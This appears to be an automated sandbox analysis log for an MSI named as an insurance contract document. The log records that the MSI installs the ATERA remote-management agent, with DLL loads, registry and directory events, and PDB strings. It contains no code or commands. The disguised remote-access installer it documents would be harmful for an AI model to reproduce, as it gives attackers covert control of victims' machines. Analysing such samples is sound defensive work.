                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: schannel.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile written: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA NetworksJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgentJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.configJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}Jump to behavior
                                Source: Documento_Contrato_Seguro_25105476.msiStatic file information: File size 2994176 > 1048576
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2778902999.00000000070F7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdbSHA256 source: AgentPackageMonitoring.exe, 00000025.00000002.2376501962.000001D73B702000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2773569098.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2770793562.0000000002C28000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbh source: rundll32.exe, 0000003B.00000003.2770793562.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773621288.0000000002C43000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1914378345.0000016E73872000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb6 source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60AA9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000014.00000002.2186532729.00000167D18B2000.00000002.00000001.01000000.00000018.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3069197465.00000277DFBD2000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3068434031.000002C38B812000.00000002.00000001.01000000.0000004B.sdmp
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb`? source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000003.2770950879.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdbp+ source: AgentPackageMonitoring.exe, 00000025.00000002.2377234109.000001D73B812000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbd source: AgentPackageUpgradeAgent.exe, 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2366091778.000001D722932000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdbSHA256G source: AgentPackageInternalPoller.exe, 00000039.00000002.2735782031.000001AA4B8B2000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60A80000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdb source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDBP{ source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb8 source: AgentPackageProgramManagement.exe, 0000003C.00000002.3068434031.000002C38B812000.00000002.00000001.01000000.0000004B.sdmp
                                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdbSHA256 source: AgentPackageInternalPoller.exe, 00000039.00000002.2751650874.000001AA64032000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\A\_work\39\s\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net45\System.Runtime.InteropServices.RuntimeInformation.pdb source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1914378345.0000016E73872000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb( source: rundll32.exe, 0000003B.00000003.2770950879.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ?\C:\Windows\dll\mscorlib.pdb source: AgentPackageSTRemote.exe, 00000023.00000002.3129190490.0000015439D8E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageOsUpdates\AgentPackageOsUpdates.Common\obj\Release\AgentPackageOsUpdates.Common.pdb!_;_ -__CorDllMainmscoree.dll source: AgentPackageOsUpdates.exe, 00000034.00000002.2787380704.000001FC47D22000.00000002.00000001.01000000.0000003C.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/src/Polly/obj/Release/net461/Polly.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2818037392.000001FC60622000.00000002.00000001.01000000.0000003F.sdmp
                                Source: Binary string: ib.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60AA9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageInternalPoller\AgentPackageInternalPoller\obj\Release\AgentPackageInternalPoller.pdb source: AgentPackageInternalPoller.exe, 00000039.00000000.2679670717.000001AA4AD72000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 00000010.00000002.2532683015.000002BEFC122000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 00000010.00000002.2532683015.000002BEFC122000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2378477877.000001D73B962000.00000002.00000001.01000000.00000024.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dows\dll\mscorlib.pdbE source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60AA9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\code\dapper-dot-net\Dapper\bin\Release\net45\Dapper.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2376997668.000001D73B7D2000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\AgentPackageProgramManagement\obj\Release\AgentPackageProgramManagement.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000000.2691141024.000002C38B3B2000.00000002.00000001.01000000.00000035.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\ThirdPartyPackageManager\obj\Release\ThirdPartyPackageManager.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000002.3067723786.000002C38B7E2000.00000002.00000001.01000000.00000049.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2376501962.000001D73B702000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.2149423855.00000167D1432000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2778902999.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2188590383.00000280D3882000.00000002.00000001.01000000.00000019.sdmp, AgentPackageUpgradeAgent.exe, 00000030.00000002.2631969820.00000235BA360000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.PDBm source: rundll32.exe, 0000003B.00000003.2771430754.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp
                                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdbSHA256~ source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2188590383.00000280D3882000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2378477877.000001D73B962000.00000002.00000001.01000000.00000024.sdmp, AgentPackageUpgradeAgent.exe, 00000030.00000002.2631969820.00000235BA360000.00000002.00000001.01000000.0000002A.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \mscorlib.pdbpdblib.pdb@rP source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2966294099.000001AF6AFC2000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: l\System.pdb} source: rundll32.exe, 0000003B.00000003.2770793562.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773621288.0000000002C43000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdbTlnl `l_CorExeMainmscoree.dll source: AgentPackageTicketing.exe, 00000032.00000000.2625128438.00000277DF3C2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2966294099.000001AF6AFC2000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageOsUpdates\AgentPackageOsUpdates\obj\Release\AgentPackageOsUpdates.pdb source: AgentPackageOsUpdates.exe, 00000034.00000000.2661915081.000001FC474F2000.00000002.00000001.01000000.0000002B.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdb source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
